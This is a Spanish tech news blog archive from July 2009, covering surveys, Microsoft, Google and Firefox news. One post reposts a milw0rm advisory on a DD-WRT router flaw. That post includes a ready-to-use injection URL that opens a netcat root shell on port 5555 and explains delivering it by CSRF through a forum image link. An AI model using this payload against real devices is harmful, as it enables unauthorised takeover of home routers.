martes, 28 de julio de 2009

El 25% de los jóvenes tiene citas a ciegas a través de Internet

Alrededor del 25 por ciento de los adolescentes y jóvenes de entre 15 y 25 años ha quedado al menos alguna vez con un desconocido por Internet, mientras que el 77.2 por ciento no lo ha hecho nunca, según una encuesta publicada por el Injuve, un organismo dependiente del Ministerio de Igualdad.

Esta investigación, denominada "Adolescentes y jóvenes en la red; factores de oportunidad", ha incorporado una muestra de 1,111 encuestas realizadas a un colectivo de entre 15 y 25 años de edad.

Su presentación en rueda de prensa ha corrido a cargo del director general del Instituto de la Juventud (Injuve), Gabriel Alconchel, y de Angeles Rubio, profesora de la Universidad Rey Juan Carlos y doctora en Comercialización y Estudios de Mercado.

Según los datos, el 9.8% de los jóvenes y adolescentes encuestados dice que no queda "casi nunca" con personas desconocidas anteriormente contactadas en la red, el 5.4% lo hace "muy pocas veces"; el 4.4% "regularmente"; el 1% "habitualmente", y el 2.2%, "siempre".

Internet es "la ventana al mundo" para la mayoría de los jóvenes y adolescentes, un colectivo que accede habitualmente a páginas "web" en un porcentaje del 96%, "porque forma parte de su ADN, prácticamente", y aunque los riesgos de ese fenómeno pueden suponer una especie de "gruta" oscura, las ventajas de esta tecnología son mucho mayores que sus peligros, tal como confirman los datos.

De acuerdo a los resultados de esta investigación, el colectivo entrevistado manifiesta gran rechazo ante aquellos contenidos en la red relacionados con delitos sexuales, el 39.5%, mientras que ese rechazo es inferior en lo relativo a imágenes denigrantes (24%), violencia (22.5%), y el bullying y los comentarios humillantes (20%).

A continuación, se sitúa el rechazo de este colectivo ante contenidos que puedan generar información falsa o tendenciosa (por ejemplo, el 19.2% al peligro de las sectas), la intromisión en la vida privada (problemas de pareja, el 12.3%) o la práctica de cibersexo (13.5%).

El tema de "las adicciones" es el principal riesgo de Internet, según la percepción de los jóvenes, con un porcentaje del 46.9%, pero las páginas "web" relacionadas con aquéllas son las menos visitadas por el colectivo de entre 15 y 25 años: los juegos "on line", el 10.9%; el cibersexo, el 7.9%; los "chats", el 6.9%, y las apuestas "on line", el 2.2%.

Otro de los grandes peligros de Internet, es decir, lo que podría considerarse como "la gran cueva" de la red, según los responsables de la investigación, tiene que ver con "la ligereza" con la que se interpretan a menudo los datos "on line", puesto que "no se suelen poner en tela de juicio, dándose erróneamente todo por válido".

Del estudio se desprende además que la brecha en el acceso a Internet por parte de los chicos respecto a las chicas va desapareciendo; además, sólo el 3.4 por ciento del colectivo de entre 15 y 25 años no accede nunca a la red.

El 52% no compra nunca por Internet y el 80% de los internautas de entre 15 y 25 años se conecta desde casa, de acuerdo a datos de 2008, algo impensable diez años antes, cuando esa tasa era del 34%, según Rubio.

El 67% de los internautas entrevistados accede a páginas de Internet para su aprendizaje y el 89% para adquirir información; el 85%, para el acceso a productos culturales; el 79.9%, para divertirse; el 80%, para relaciones sociales, y el 58%, por motivos laborales y oportunidades de trabajo.

El 36% del colectivo entrevistado accede a Internet en soledad, mientras que el 61% lo hace acompañado, habitualmente con amigos.


lol

Problema de seguridad en el firmware para routers DD-WRT

Se ha descubierto un error de validación de parámetros de entrada en el interfaz web de DD-WRT v,24. Esto podría ser usado por un atacante remoto sin autenticar para eludir restricciones a través de una URL especialmente manipulada. Este error permite ejecutar comandos del sistema con privilegios de "root".

DD-WRT es un firmware no oficial para routers como Linksys, D-Link y La Fonera, entre otros. Está traducido a más de diez idiomas y es compatible con IPv6, soporta WIFI con distintos tipos de cifrado, permite montar VPN y hasta tiene una versión con VoIP, entre otros tantos servicios típicos de un router.

Este fallo se ha publicado en forma de exploit con todo lujo de detalles (incluso existe un vídeo). El exploit permite lanzar una consola por el puerto 5555 del router.

Por suerte, el interfaz solo está habilitado para la red local salvo que se active para acceder a él de forma remota. La vulnerabilidad ha sido reconocida y ya existe un parche para solucionar este fallo.

Más Información:

Web oficial de DD-WRT
http://www.dd-wrt.com/dd-wrtv3/index.php

Descarga del parche
http://www.dd-wrt.com/dd-wrtv2/down.php

This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
at the latest 24 sp1 version of the firmware.

The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:

859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;


......... (snip)............

899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s/tmp/shellout.asp");

........... (snip)..........

926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;

------------

3) issue 3: httpd runs as root :)



Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:

http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM


Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be supressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)


A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)


Thanks krassyo at krassyo.info for his support :)


Leka vecher :)

# milw0rm.com [2009-07-20]

domingo, 19 de julio de 2009

iPhone 3GS, primera toma de contacto

Le roban los datos a Twitter por un "pasword"


Twitter ha sido esta semana víctima de un pirata informático que ha robado cientos de documentos, hasta 300, de la popular red social y los ha remitido a diferentes empresas de Internet.

Una de estas empresas,
TechCrunch, ha publicado -tras un debate sobre la conveniencia o no de hacerlo- parte del material sustraído, entre los que figuran documentos corporativos sobre sus empleados, números de teléfono y currículos.

Entre la documentación robada y enviados a la mencionada web de noticias de tecnología TechCrunch, la cual ha desvelado sólo aquellos datos que han considerado que por "su valor noticioso era apropiado publicar ", según aseguró Michael Arrington, fundador y coeditor de esta publicación.

La información recolectada también refleja las expectativas en cuanto a usuarios de Twitter, que esperan sumar más de 25 millones para final de año. Y a número de empleados. Para 2013, la compañía espera llegar a 5.200 empleados, sumar 1.000 millones de usuarios, 1.540 millones de dólares de ingresos y 1.100 millones de ganancias netas, según ha informado el diario económico Cinco Días.

Según la
BBC, el hacker -conocido como ´Hacker Croll´- sería de origen francés y presumiblemente accedió a la información adivinando la contraseña de un empleado de Twitter hace un mes. En este sentido, Robin Wauters, uno de los empleados de Techcrunch ha revelado en su blog que una de las contraseñas utilizadas por los trabajadores de la red social para entrar en su servidor era literalmente ´password´.

Via
20minutos

Bill Gates quiere patentar sistema anti-huracanes


Lo dicho, es sabido que el comportamiento de los huracanes se ve afectado según la temperatura de las aguas marítimas; cuando el huracán se adentra a una zona de aguas frías el mismo disminuye su fuerza y por el contrario, si el huracán se adentra a zonas de mayor temperatura cobra mayor intensidad.

No soy experto en huracanes pero esta noticia me llamó la atención, la leí en
La Gaceta donde informan que ésto será financiado por Bill Gates con la intención de vender seguros contra huracanes, ésta solicitud de patente está firmada por 12 científicos donde la mayoría de ellos son físicos e investigadores del estado de Washington, donde precisamente es el lugar sede de la empresa Intellectual Venture Lab.


Dicha empresa es un laboratorio de inventos y ha sido fundada por directivos de Microsoft.


La explicación breve de la patente es incluir una fota de barcazas, que estarían bombeando agua fría desde el fondo del mar hacia la superficie y por ende, el enfriamiento de la zona creando una especie de pared de líquido frío que anule o disminuya la fuerza del huracán antes de llegar a tierra.


Espero que el enfriamiento artificial de las zonas marítimas no afecte a la flora y fauna marítima ya que en vez de proteger al planeta, lo estarían destruyendo...


Hasta la próxima.


viernes, 17 de julio de 2009

Los jugadores mayores de 55 años son los que más horas dedican a videojuegos

Los jugadores mayores de 55 años son el grupo de población que más horas dedica a los videojuegos porque disponen de más tiempo de ocio o tienen menos presión laboral y conforme avanza la edad pierden interés por los juegos de acción y estrategia en favor de los educativos o puzzles.

Son algunas de las conclusiones del estudio “Hábitos e iniciación a los videojuegos de los mayores de 35 años” promovido por la Asociación de Videojugadores y realizado por la Universidad Complutense de Madrid, basado en 974 encuestas a hombres y mujeres con edad superior a 35 años.

Aunque son los jóvenes los principales usuarios de los videojuegos (entre el 80 y el 90 por ciento los utilizan), los mayores de 55 años son los que más tiempo dedican a jugar con ellos.

Dedican más de tres horas al día, el 80 por ciento de los jugadores adultos de entre 55 y 64 años, la mitad de los mayores de 65 años y los de entre 45 y 54 años y el 43 por ciento de los que tienen entre 35 y 44 años.

Según el informe, una de cada cuatro personas de entre 35 y 44 años se divierte habitualmente con los videojuegos y los mayores de 65 años lo hace por lo menos una vez a la semana.

“Los videojuegos son cada vez más sencillos y los mayores no quieren perder el tren ni la oportunidad de compartir el ocio con sus hijos o nietos”, ha asegurado el presidente de la Asociación de Desarrolladores de Ocio Interactivo Digital (DOID), Ramón Nafria, encargado de la presentación del estudio.

PUZZLES Y JUEGOS EDUCATIVOS

Respecto a los géneros favoritos, las mujeres -el 40 por ciento de los usuarios de videojuegos- prefieren los de puzzles, infantiles, educativos y de deportes, porque los consideran más adecuados para compartir este tiempo de ocio con los hijos y nietos y también “los que les hacen pensar”, explica Nafria.

El PC es la plataforma a la que dedican más tiempo las personas de entre 35 y 44 años, mientras que los mayores de 65 años se decantan mayoritariamente por la Wii.

Sobre la forma de iniciarse, las personas de entre 35 y 44 ya jugaban desde la juventud, los de 45 a 54 les han enseñado los hijos y a los mayores de 55 otros familiares.

También existen diferencias respecto a lo que buscan con el juego, los de 35 hasta 65 entretenimiento y los mayores de esa edad compartir el ocio con la familia.

Al menos juegan una vez a la semana, el 61,9 por ciento de las personas entre 35 y 44 años; el 41 por ciento de entre 44 y 55 años; el 18,9 de entre 55 y 65 años y el 23,7 por ciento de los mayores de 65 años.

LOS MÁS ‘JUGONES’

Según el responsable del estudio, los principales usuarios de los videojuegos viven en Valencia, Madrid y Barcelona, mientras que no se perciben grandes diferencias respecto al resto de los habitantes en otras localidades, independientemente de que residan en ciudades o zonas rurales.

Los principales productos consumidos son Wii (Wii Play, Wii Fit y Mario Kart), de Nintendo (Brain Training, New Super Mario Bos y Smash Bros Brawl), la última entrega de GTA y Pro Evolution Soccer de Paystetion 2, según la asociación DOID.

Otra de las conclusiones del informe es que los españoles emplean con asiduidad los contenidos digitales.

El 67 por ciento no podría vivir sin Internet, lo que supera a los que afirman que no podrían vivir sin coche, que son el 51 por ciento.

Nueve de cada diez hombres dicen que la actividad en la que más tiempo invierten es visualizar vídeos en Internet, mientras que las mujeres, en un 80 por ciento, se interesan por participar en juegos individuales.



martes, 14 de julio de 2009

Netbook tactil de Apple


Parece ser que Apple dio ordenes de fabricación de un misterioso dispositivo que traería una pantalla táctil de 9.7 pulgadas y supuestamente saldría con un precio de alrededor de 800 dólares.

Esta sería la nueva Netbook tactil de Apple que sin duda sería de una las noticias bomba del año y una revolución segura en los netbooks.

Vía: gizig

Microsoft inicia su Conferencia de Socios con la presentación de Office 2010



En medio de la grave crisis económica mundial, Microsoft abre su Conferencia Mundial de Socios en Nueva Orleans con el anticipado anuncio del lanzamiento de Office 2010 así como nuevos detalles de Windows 7, el sistema operativo que sustituirá a Vista.

A pesar de la crisis, Microsoft ha reunido en Nueva Orleans miles de socios (desde programadores a distribuidores de sus productos) procedentes de todo el mundo para presentar sus últimas novedades y explicar su estrategia.

Microsoft lanzará un paquete de aplicaciones online para competir con Google

Una de las novedades más esperadas será la presentación de la última versión de su popular grupo de aplicaciones Office. Otro anuncio anticipado por los especialistas del sector es el Office Web Applications (OWA), una alternativa al Office 2010 que se ejecutará desde el navegador de Internet.

OWA pondrá de nuevo a Microsoft en camino para enfrentarse con Google (quienes recientemente han anunciado su sistema operativo) en el creciente sector de aplicaciones ejecutadas a través de Internet, en vez de tener el programa residente localmente en el sistema.

Allison Watson, vicepresidenta de Microsoft para del Grupo de Socios Mundial, anunció antes de la conferencia que la empresa de Redmond "está entrando el mayor año de lanzamientos de su historia". "La economía global ha cambiado las dinámicas de la relación del vendedor/socio. La disputa entre grandes vendedores para lograr los servicios de la comunidad global de revendedores es más enconada que nunca", añadió Watson.

Entre los productos que Microsoft lanzará en los próximos meses destaca el nuevo sistema operativo Windows 7, que sustituirá a Vista, y que está previsto salga a la venta en octubre aunque los fabricantes de sistemas informáticos tendrán acceso al producto antes.

Watson destacó que Microsoft ha trabajado de forma estrecha con sus socios para el desarrollo de Windows 7 "para asegurar que tienen las herramientas y recursos que necesitan para el desarrollo y compatibilidad de Windows 7". Microsoft ha sido criticada por los problemas de Vista, especialmente en lo referente a compatibilidad.

Via 20minutos.es


Microsoft prepara su 'Spotify'

El éxito de sitios como Spotity o Last.fm, los cuales permiten la audición de archivos musicales desde sus mismas páginas, sin necesidad de descargarlos previamente, no ha pasado desapercibido al gigante del software, Microsoft.

El nuevo sitio tendrá un mecanismo parecido al de Spotify

Según aseguran varios medios, Microsoft ya está preparando su nuevo servicio web de música en streaming.

"La música es un área muy importante para Microsoft. Estamos detrás de lanzar un servicio de música en streaming de inmediato", adelantó hace unos días el jefe ejecutivo de MSN, Peter Bale, en unas declaraciones que recoge The Telegraph. El diario apunta que este lanzamiento podría tener lugar en un mes.

El directivo no ha tenido problemas en reconocer su inspiración en Spotify: "El nuevo sitio tendrá un mecanismo parecido al de Spotify, pero todavía estamos analizando cómo funcionará el modelo".

Los usuarios de Spotify pueden acceder a música -sin descargársela- de forma gratuita. A cambio, tienen que escuchar un minuto de publicidad cada media hora. Si quieren eliminar los anuncios, deben pagar una cantidad de unos 10 euros al portal.

Para Bale, la gran baza de Microsoft es a la de aportar al producto la calidad.

Via 20minutos.es


Espionaje a través del enchufe


Es posible espiar a través de la corriente eléctrica.

* Los espías pueden servirse de los cables enchufados del teclado.
* Pulsar una tecla crea una información que puede descifrarse.

El espionaje informático tiene métodos que van mucho más allá del spyware, los troyanos y demás virus. Los simples cables enchufados de un teclado pueden servir de herramienta idónea para espiar a una persona.

Así lo afirma un estudio realizado por la compañía de seguridad Inverse Path en el que se asegura que la poca protección de los cables del teclado permite el espionaje mediante el análisis de la información de las fugas de potencia. Cada tecla presionada se convierte en una cadena de unos y ceros que viaja a través del cable creando variaciones de tensión.

Alguien con los conocimientos y medios necesarios puede interpretar el tecleo a través del cable

Un cracker que posea los conocimientos necesarios y acceso a la línea eléctrica podría crear un dispositivo capaz de medir y descifrar esa información codificada.

Los expertos realizaron pruebas de este tipo de espionaje con un teclado para PC que se conecta mediante un cable con conexión PS/2. Estudiaron las fugas de potencia que se producen al usarlo en una toma de tierra desde una distancia máxima de 15 metros del objetivo, aunque podría realizarse desde mucho más lejos.

El objetivo del experimento era demostrar que el robo de información puede tener lugar de las formas más insospechadas.

IBM crea un programa que enmascara datos confidenciales

Los laboratorios israelíes de IBM han creado un programa, Magen, que enmascara en un documento digital los contenidos que son considerados confidenciales por el emisor. A diferencia de otros programas, Magen no manipula una copia del archivo sino que oculta los datos en el documento original para las personas que no estén autorizadas a conocer la integridad del mismo. Al no obtener una copia garantiza mejor la seguridad del documento ya que evita que circulen múltiples versiones del mismo.

El programa analiza ópticamente el documento y procede a enmascarar los datos sensibles en función de si el receptor está autorizado o no a obtenerlos. En la documentación de la propia IBM se pone como ejemplo de uso de este programa el de una compañía de seguros que trabaja con terceros en pólizas médicas pero que no puede trasladar a éstos la información personal sanitaria de sus clientes.

Via elpais.com

Vídeos colgados en Youtube provocan la detención de cuatro policías corruptos en Marruecos

Un móvil provisto de una cámara y un cibercafé pueden ser armas eficaces en la lucha contra la corrupción. Varios gendarmes y policías marroquíes han sido grabados cobrando backshish (pequeños sobornos) a un camionero anónimo en puestos de control a la entrada de las ciudades de Ifni, colonia española hasta 1969, y de la vecina Tiznit.

Los vídeos fueron rodados desde la cabina del camión. Acompañados de algunos subtítulos explicativos y de canciones humorísticas, fueron colgados después en Youtube (ver vídeo 1 | vídeo 2) y en una web creada en Francia para la inmigración. Sus autores "son jóvenes de Ifni", según Abdalá Birdaha, responsable en Tiznit de la Asociación Marroquí de Derechos Humanos.

Lejos de desmentir la veracidad de los vídeos, la Dirección General de la Seguridad Nacional abrió una investigación. Cuatro policías, entre ellos un comisario, fueron detenidos y, el pasado fin de semana, fueron puestos a disposición de la fiscalía de Agadir, según anunció en un comunicado. Está ahora por ver si la Gendarmería, un cuerpo militarizado, hará otro tanto.

Es la segunda vez que los vídeos provocan en Marruecos purgas en las filas de las fuerzas de seguridad. La primera fue en julio de 2007 en Targuist, en el Rif, otra área que fue colonia española. El "francotirador de la cámara", como se presentaba su autor, grabó, escondido detrás de una roca, a gendarmes corruptos en un control en carretera a la entrada de la ciudad. Lo atraparon y tuvo que declarar en comisaría. Salió libre, pero nueve gendarmes sí fueron enviados a prisión.

Nace un nuevo modelo de publicidad 'online'

Los usuarios de cadenaser.com que se registren, a partir de hoy, en Adagreed podrán ver publicidad personalizada por la que recibirán puntos, que podrán canjear por productos y servicios. Este primer acuerdo con un medio online supone un total de 1,2 millones de potenciales usuarios para Adagreed. La plataforma universal de distribución de publicidad digital aceptada ha alcanzado un acuerdo con Box Publicidad (ww.boxpublicidad.es) que integra prensa e Internet, perteneciente al Grupo PRISA, para incorporar en la web de la SER su servicio.

Los usuarios de cadenaser.com que se registren en Adagreed obtendrán puntos (adlooks) por la publicidad que vean en esas páginas y podrán canjearlos por servicios de salud y belleza, estancias y viajes, espectáculos, electrónica doméstica, deportes, telefonía e Internet o informática. Además, les ofrece la posibilidad de donar parte del ingreso publicitario a fines sociales.

Adagreed entró en funcionamiento el pasado 30 de abril, a través de www.adagreed.com, y cuenta ya con cerca de 40.000 usuarios registrados. Desde hoy, las personas que entren en esa dirección verán una invitación para registrarse, a través de un formulario con seis preguntas para determinar su perfil sin perder el anonimato.

Via elpais.com

Microsoft responde a Google: Office gratis y on-line


Google desarrolló una serie de programas de ofimática que están disponibles a través de Internet y asociados a sus servicios on-line, como el correo electrónico. Tras esta jugada y con Chrome OS acechando entre las sombras, Microsoft confirma un paquete de Office gratis y disponible en Internet. Los ingresos se buscarán mediante publicidad.

El mayor fabricante de software del mundo ofrecerá un procesador de textos, de planillas de cálculo, de presentaciones y un programa para tomar notas con la misma apariencia de los incluidos en el paquete Office que se vende para ordenadores personales.

Esta es la última novedad en una creciente guerra entre los dos gigantes de la tecnología, que desde que Google anunciara un sistema operativo ha tomado un nuevo, inesperado y apasionante rumbo, rodeado por rumores positivos para el consumidor -como una rebaja en los precios de los ordenadores-.

Pero sólo era el último movimiento, ya que hace pocos meses Microsoft lanzó el mes pasado un nuevo motor de búsquedas, llamado Bing, que ha robado algo de participación de mercado a Google.

DUDAS SOBRE LOS EFECTOS

Es evidente que el lanzamiento de una versión gratuita de Office afectará las ventas de la unidad de negocios de más vendedora y rentable de Microsoft. Uno de los títulos más populares de Office es una versión doméstica que se vende a 150 dólares. Incluye los cuatro programas que Microsoft ofrecerá gratis.

“Microsoft está en una posición difícil. Su competencia no está solo molestando, están regalando su producto más competitivo”, consideró el analista de Forrester Research Sheri McLeish.

La división Office anotó utilidades operacionales de 9.300 millones de dólares sobre ventas por 14.300 millones de dólares en los primeros tres trimestres de su año fiscal. McLeish dijo que espera que Microsoft supere a Google en el mercado dado que cientos de millones de personas que usan Office irán a probar la versión en internet.

¿De dónde vendrán, entonces, los ingresos? Microsoft buscará obtener dinero llevando a esos usuarios a sus sitios financiados por publicidad, incluso el servicio de búsquedas Bing.

FUTURO ESPERANZADOR

Los analistas consideran que los primeros signos de éxito del Bing sugieren que Microsoft podría estar logrando dar la vuelta a su división de internet, que da pérdidas.

La compañía lanzará la oferta gratuita después de empezar a vender el Office 2010, su próximo gran lanzamiento del producto, en el primer semestre del año próximo. Su versión actual corresponde a enero del 2007.

El fabricante de software reveló una primer versión el lunes en una conferencia para socios de negocio en Nueva Orleans. Será distribuida a decenas de miles de evaluadores.

La portavoz de la compañía, Janice Kapner, dijo que la versión libre de Internet brindará “una experiencia muy rica” y probablemente tenga más funcionalidad que la de Google.

Entre otras actualizaciones de programas que Microsoft tiene planeadas para el 2010, en octubre saldrá la nueva versión del omnipresente sistema operativo y también prepara una nueva versión de su muy utilizado servidor de correo.

Microsoft también planea dos otras versión de Internet del Office para empresas.

Via Noticiasdot

jueves, 9 de julio de 2009

El hacker más famoso del mundo visita Campus Party


Kevin Mitnick, lleva más de 15 años explorando e investigando la vulnerabilidad de los sistemas operativos y de las herramientas de comunicación de las empresas.

La segunda edición de Campus Party en Colombia ha vuelto a abrir sus puertas al público general para que disfrute, durante una semana, de la posibilidad de divertirse y explorar la tecnología. Se trata de una verdadera fiesta tecnológica no sólo para los 3.500 participantes, sino para los miles de bogotanos que se acercan a Corferias para conocer el mayor evento de tecnología, creatividad, ocio y cultura digital en Red del mundo.

Este año, la cita ha contado, además, con la presencia del famoso hacker Kevin Mitnick, quien ayer visitó las instalaciones. Con más de 15 años de experiencia explorando e investigando la vulnerabilidad de los sistemas operativos y de las herramientas de comunicación de las empresas, Mitnick ha compartido con los periodistas y campuseros lo que para él es hoy la mayor amenaza de seguridad: “la ingeniería social, un tipo de ataque altamente efectivo que potencia el elemento humano de la seguridad corporativa”. Para Mitnik es esencial que las empresas tengan presente no sólo la tecnología sino las personas y los procesos de trabajo en la organización a la hora de desarrollar programas de seguridad. Sólo así “se podrán evitar ataques de hackers que a diferencia del pasado hoy no actúan para superar un reto informático, sino motivados por la posibilidad de ganancia económica”.

El público visitante podrá interactuar con lo último en robótica y realidad virtual

Las áreas que hacen de Campus Party Colombia un evento para el disfrute de todos los bogotanos son Campus Futuro y la zona de Inclusión Digital. La primera es una exposición interactiva, que sirve como escaparate tecnológico donde mostrar las últimas innovaciones y proyectos llegados de todo el mundo. Una de las atracciones destacadas es LevelHead, un juego de memoria espacial que sorprenderá a todos los asistentes. Su creador, el neozelandés Julian Oliver, asegura que revolucionará el mundo de los videojuegos. Entre los protagonistas humanoides de Campus Futuro se encuentran Dabot y Chief Cook, dos robots capaces de aprender nuevas funciones partiendo de la enseñanza humana, bien sea por imitación de hábitos de comportamiento o por aprendizaje. Tanto el juego como los robots repetirán experiencia campusera, puesto que serán también expuestos en Valencia.

Por otro lado, en el área de Inclusión Digital, Internet se pone al alcance de todos los bogotanos a través de los bautizos digitales, promovidos por Campus Party y la Secretaría de Desarrollo Económico de la ciudad. Estas acciones permiten a todas aquellas personas que no han tenido la oportunidad de usar un ordenador o conocer Internet, empaparse del espíritu campusero y acceder a conocimientos sobre la forma de divertirse, relacionarse, aprender o crear a través de los adelantos tecnológico y de la Red.

La experiencia de la Zona Abierta, que también será replicada en Valencia, aúna así los objetivos de Campus Party: por un lado, acercar la tecnología a los ciudadanos, y por otro ser un foro de innovación, creatividad, ciencia y ocio digital, desde el que se construye la nueva realidad gracias a la creación de contenidos y la consistencia formativa del evento.

Via http://www.ticpymes.es/

Google Chrome el sistema operativo para netbooks


La empresa Google presentará a mediados del 2010 un sistema operativo para netbooks el llamado Google Chrome, homónimo del navegador de google.

Google Chrome OS será una extensión de Chrome, el navegador de Internet lanzado por Google hace nueve meses, y sus creadores esperan que esté disponible en la segunda mitad del próximo año.

Se tratará de un sistema operativo de código abierto pensado, sobre todo, para navegar en Internet y usar aplicaciones basadas en la red, que muchos creen que acabaran sustituyendo al modelo de software bajo licencia capitaneado por Microsoft.

“Es nuestro intento para reconsiderar cómo deberían ser los sistemas operativos“, dijeron Sundar Pichai y Linus Upson, responsable de gestión de producto y director de ingeniería de Google, respectivamente, en el blog corporativo de la compañía.

“El interfaz para el usuario será mínimo para no estorbar y la mayoría de la experiencia del usuario tendrá lugar en la red”, añadieron, recordando que los sistemas operativos con los que casi todos los navegadores funcionan hoy fueron programados cuando Internet aún no era algo frecuente.

La idea es mejorar la experiencia del usuario en Internet, que es donde Google desea que pasemos la mayor parte de nuestro tiempo ya que sus aplicaciones y servicios están basados en la red.

Aunque Chrome OS funcionará también en ordenadores de sobremesa, el sistema estará especialmente diseñado para netbooks, portátiles de bajo coste y pocas prestaciones cuya popularidad está creciendo a pasos agigantados.

Un 80 por ciento de los netbooks en el mercado utilizan Windows XP, una versión más antigua, barata y menos rentable para Microsoft que Vista, por lo que la firma ha diseñado Windows 7, la última versión, para operar tanto en netbooks como en PCs.

Chrome y Android

Chrome OS es, en realidad, la segunda incursión de Google en el área de los sistemas operativos después de Android, un sistema operativo para móviles que funciona también en netbooks y que ya ha sido adoptado por numerosos fabricantes.

El buscador reconoce que Chrome OS y Android se solapan en algunos aspectos, pero insiste en que son sistemas independientes y añade que la posibilidad de elegir entre ambos “impulsará la innovación y beneficiará a todos, incluido Google”.

Quién, posiblemente, resultará menos beneficiado es Microsoft, que ve como aumentan los competidores de Windows.

Google y Microsoft cara a cara

La incursión de Google en el mercado de los PCs se veía venir desde hace tiempo y en su momento. Chrome fue el primer toque de advertencia al gigante Microsoft pero todos sabiamos que Google no se iba a quedar allí.

El navegador desarrollado por Google estaba pensado para ser una puerta abierta a la “nube”, ese concepto de informática distribuida por la red que acuñaron SUN y Oracle a finales de los 90 y que Google ha retomado como propia.

Chrome encajaba perfectamente con la amplia gama de servicios online de Google y principalmente “Docs”, una alternativa online y gratuita a Office.

Que Google haya optado por bautizar como “Chrome” a su sistema operativo como una evolución del navegador es algo lógico aunque no deja de ser curioso que precisamente este sea el argumento que emplea Microsoft para defender la inclusión de Explorer en Windows ante las presiones de la Comisión Europea y las quejas del propio buscador ante las instancias europeas.

Aunque el sistema operativo contará con un enorme apoyo entre una parte de la comunidad de software libre deberá ser capaz de conquistar “el corazón” de los consumidores si realmente quiere triunfar en el mercado.

Y es que por el momento las incursiones de Google en el área de software no han sido todo lo exitosas que deberían haber sido si las comparamos con su monopolio en las búsquedas. Salvo Google Maps, una excelente aplicación presente en infinidad de dispositivos, “Google Docs” sigue siendo una apuesta importante pero que no consigue encontrar su espacio y “Chrome”, el navegador, ha sido uno de los grandes fracaso del líder de las búsquedas. Con apenas un 1,5% del mercado total (y publicidad machacona en GMail que deja durante segundos el cliente de correo inservible hasta que optamos por descargarlo o pulsar ahora NO), está muy lejos de ser una alternativa creíble al Internet Explorar o a Firefox, la enorme comunidad de usuarios que en un principio podrían haber abrazado este nuevo navegador.

Via http://www.noticiasdot.com

miércoles, 1 de julio de 2009

Videorama HTC Hero Sense

HTC Hero Sense

Vimeo High Definition Videos


Como todos sabemos existe una gran cantidad de sitios para almacenar videos en la red, como el archi re conocido youtube, pero de todos estos sitios se destaca uno por permitir almacenar videos de alta definición y calidad

Vimeo tienen un canal completo de contenido alta definición a 1280×720 pixeles de resolución. Ellos te recomiendan tener una conexión de al menos 2 Mbps para disfrutar del video HD, aunque con una conexión más lenta igual podrás verlo — aunque estará buffering y buffering y buffering todo el rato. Obviamente para poder disfrutar de la mejor resolución de los videos es recomendable verlos a pantalla completa haciendo click en el botón “Full”.

Via ingeek.com.es

La nueva versión de Firefox ya está disponible


Se trata de la 3.5, que agrega la navegación privada, la posibilidad de recuperar ventanas cerradas y es más veloz que la versión anterior

Finalmente, luego de cinco versiones beta y dos candidatas a lanzamiento, la Fundación Mozilla anunció que está disponible Firefox 3.5, el segundo browser más utilizado del mundo.

Un atractivo adicional para los usuarios de la región es que se encuentra disponible en versiones específicas para Chile y México, con pequeñas modificaciones respecto al uso del idioma en los distintos países.

Los usuarios argentinos desde hace tiempo contaban con una versión propia. (Links relacionados para la descarga)

Si bien son varias las mejoras, las tres principales para destacar son la posibilidad de navegar por internet de incógnito, ya existente en Google Chrome e Internet Explorer, la velocidad del Firefox 3.5 y la posibilidad de recuperar ventanas cerradas recientemente.

Bajo modalidad invisible, todo lo que realice el usuario no quedará grabado en el historial, salvo los archivos descargados y los marcadores agregados.

Por otro lado, de acuerdo a Mozilla, Firefox 3.5 es hasta 2 veces más rápido que la versión 3 y unas 10 veces más veloz que Firefox 2 interpretando JavaScript, algo cada vez más común en internet.

Desde Mozilla indican que Firefox 3.5 consume menos recursos. Y una opción que muchos disfrutarán aún más es la de recuperar las ventanas cerradas recientemente. Firefox ya ofrecía recuperar pestañas cerradas, pero no sesiones enteras salvo que la computadora se apagara involuntariamente.


Más características
La nueva versión de Firefox tiene además una configuración que permite al usuario “Olvidar una página web” que haya sido visitada. Allí se accede desde Ver/Panel Lateral/Historial/botón derecho y Olvidar este sitio web.

Mozilla mejoró además la barra de direcciones, que permite filtrar búsquedas para realizarlas sólo en el Historial, sólo con Etiquetas y otras.

Los usuarios acostumbrados a navegar con muchas pestañas disfrutarán de la posibilidad de extraerlas de una ventana y abrirla en otra nueva.

Firefox ahora incorpora un sistema de geolocalización, ideal para los usuarios que estén en otro país y no conozcan el idioma. Sólo se debe acceder a una página con este nuevo estándar y que permita búsquedas para que Firefox 3.5 devuelva una lista de restaurantes, por ejemplo, cerca de donde uno se encuentra.

Por último, se anunció para Firefox 3.5 la implementación de los elementos y de HTML5, incluyendo audio codificado en Vorbis y video codificado en Ogg Theora de manera nativa.

Microsoft Office y Google tienen un nuevo rival

Cisco Systems dijo que considera ofrecer alternativas basadas en internet para competir con el popular paquete de software. La medida también afectaría a Google

